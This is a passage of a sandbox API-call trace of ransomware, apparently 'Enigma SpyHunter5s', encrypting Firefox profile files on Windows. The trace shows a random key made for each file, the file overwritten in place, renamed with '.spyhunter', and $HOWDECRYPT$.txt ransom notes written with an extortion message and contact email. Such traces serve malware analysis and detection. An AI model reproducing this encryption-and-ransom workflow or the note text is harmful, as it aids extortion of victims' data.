lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecec*=0x30, lpOverlapped=0x0) returned 1 [0150.642] CloseHandle (hObject=0xb0) returned 1 [0150.643] GetProcessHeap () returned 0x2c0000 [0150.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.643] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.spyhunter") returned 120 [0150.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.spyhunter")) returned 1 [0150.644] GetProcessHeap () returned 0x2c0000 [0150.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.644] GetProcessHeap () returned 0x2c0000 [0150.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.644] GetProcessHeap () returned 0x2c0000 [0150.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0be0 | out: hHeap=0x2c0000) returned 1 [0150.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.645] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.645] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x270ec63*, lpNumberOfBytesWritten=0x270ed8c*=0x127, lpOverlapped=0x0) returned 1 [0150.657] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.657] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed8c*=0x2ac, lpOverlapped=0x0) returned 1 [0150.657] CloseHandle (hObject=0xb0) returned 1 [0150.657] GetProcessHeap () returned 0x2c0000 [0150.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe83c8 | out: hHeap=0x2c0000) returned 1 [0150.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.658] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.658] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec5f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ed88, lpOverlapped=0x0 | out: lpBuffer=0x270ec5f*, lpNumberOfBytesWritten=0x270ed88*=0x127, lpOverlapped=0x0) returned 1 [0150.659] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.659] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ed88, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ed88*=0x2ac, lpOverlapped=0x0) returned 1 [0150.659] CloseHandle (hObject=0xb0) returned 1 [0150.660] GetProcessHeap () returned 0x2c0000 [0150.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe5538 | out: hHeap=0x2c0000) returned 1 [0150.660] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed28 | out: pbBuffer=0x270ed28) returned 1 [0150.660] GetProcessHeap () returned 0x2c0000 [0150.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.660] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed20*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed20*=0x30) returned 1 [0150.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.660] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0150.660] StrStrW (lpFirst=".metadata", lpSrch=".txt") returned 0x0 [0150.661] GetProcessHeap () returned 0x2c0000 [0150.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.661] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ece4*=0x0, lpOverlapped=0x0) returned 1 [0150.661] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.661] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270ece4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ece4*=0x0, lpOverlapped=0x0) returned 1 [0150.661] GetProcessHeap () returned 0x2c0000 [0150.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.661] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.661] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ece4, lpOverlapped=0x0 | out: lpBuffer=0x270ed24*, lpNumberOfBytesWritten=0x270ece4*=0x4, lpOverlapped=0x0) returned 1 [0150.662] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ece4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ece4*=0x30, lpOverlapped=0x0) returned 1 [0150.662] CloseHandle (hObject=0xb0) returned 1 [0150.662] GetProcessHeap () returned 0x2c0000 [0150.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.663] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.spyhunter") returned 141 [0150.663] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata.spyhunter")) returned 1 [0150.824] GetProcessHeap () returned 0x2c0000 [0150.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.824] GetProcessHeap () returned 0x2c0000 [0150.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.825] GetProcessHeap () returned 0x2c0000 [0150.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc47f0 | out: hHeap=0x2c0000) returned 1 [0150.825] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed20 | out: pbBuffer=0x270ed20) returned 1 [0150.825] GetProcessHeap () returned 0x2c0000 [0150.825] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.825] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed18*=0x30) returned 1 [0150.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned 112 [0150.825] StrStrW (lpFirst="content-prefs.sqlite", lpSrch=".txt") returned 0x0 [0150.826] GetProcessHeap () returned 0x2c0000 [0150.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.826] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecdc*=0x2800, lpOverlapped=0x0) returned 1 [0150.828] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.828] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecdc*=0x2800, lpOverlapped=0x0) returned 1 [0150.828] GetProcessHeap () returned 0x2c0000 [0150.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.828] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.828] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x270ed1c*, lpNumberOfBytesWritten=0x270ecdc*=0x4, lpOverlapped=0x0) returned 1 [0150.829] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecdc*=0x30, lpOverlapped=0x0) returned 1 [0150.829] CloseHandle (hObject=0xb0) returned 1 [0150.837] GetProcessHeap () returned 0x2c0000 [0150.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.838] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.spyhunter") returned 122 [0150.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.spyhunter")) returned 1 [0150.839] GetProcessHeap () returned 0x2c0000 [0150.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.839] GetProcessHeap () returned 0x2c0000 [0150.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.839] GetProcessHeap () returned 0x2c0000 [0150.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8b18 | out: hHeap=0x2c0000) returned 1 [0150.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed20 | out: pbBuffer=0x270ed20) returned 1 [0150.839] GetProcessHeap () returned 0x2c0000 [0150.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed18*=0x30) returned 1 [0150.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.840] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned 109 [0150.840] StrStrW (lpFirst="compatibility.ini", lpSrch=".txt") returned 0x0 [0150.840] GetProcessHeap () returned 0x2c0000 [0150.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.840] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecdc*=0xce, lpOverlapped=0x0) returned 1 [0150.841] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.841] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecdc*=0xce, lpOverlapped=0x0) returned 1 [0150.842] GetProcessHeap () returned 0x2c0000 [0150.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.842] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.842] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x270ed1c*, lpNumberOfBytesWritten=0x270ecdc*=0x4, lpOverlapped=0x0) returned 1 [0150.843] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecdc*=0x30, lpOverlapped=0x0) returned 1 [0150.843] CloseHandle (hObject=0xb0) returned 1 [0150.843] GetProcessHeap () returned 0x2c0000 [0150.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.843] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.spyhunter") returned 119 [0150.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.spyhunter")) returned 1 [0150.844] GetProcessHeap () returned 0x2c0000 [0150.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.844] GetProcessHeap () returned 0x2c0000 [0150.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.844] GetProcessHeap () returned 0x2c0000 [0150.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc02a0 | out: hHeap=0x2c0000) returned 1 [0150.844] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed18 | out: pbBuffer=0x270ed18) returned 1 [0150.844] GetProcessHeap () returned 0x2c0000 [0150.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0150.844] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ed10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ed10*=0x30) returned 1 [0150.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.845] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 100 [0150.845] StrStrW (lpFirst="cert8.db", lpSrch=".txt") returned 0x0 [0150.845] GetProcessHeap () returned 0x2c0000 [0150.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.845] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ecd4*=0x2800, lpOverlapped=0x0) returned 1 [0150.851] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.851] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ecd4*=0x2800, lpOverlapped=0x0) returned 1 [0150.851] GetProcessHeap () returned 0x2c0000 [0150.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.851] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.851] WriteFile (in: hFile=0xb0, lpBuffer=0x270ed14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ecd4, lpOverlapped=0x0 | out: lpBuffer=0x270ed14*, lpNumberOfBytesWritten=0x270ecd4*=0x4, lpOverlapped=0x0) returned 1 [0150.852] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ecd4*=0x30, lpOverlapped=0x0) returned 1 [0150.852] CloseHandle (hObject=0xb0) returned 1 [0150.898] GetProcessHeap () returned 0x2c0000 [0150.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.898] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.spyhunter") returned 110 [0150.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.spyhunter")) returned 1 [0150.899] GetProcessHeap () returned 0x2c0000 [0150.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.899] GetProcessHeap () returned 0x2c0000 [0150.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.899] GetProcessHeap () returned 0x2c0000 [0150.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67a98 | out: hHeap=0x2c0000) returned 1 [0150.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0151.089] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at 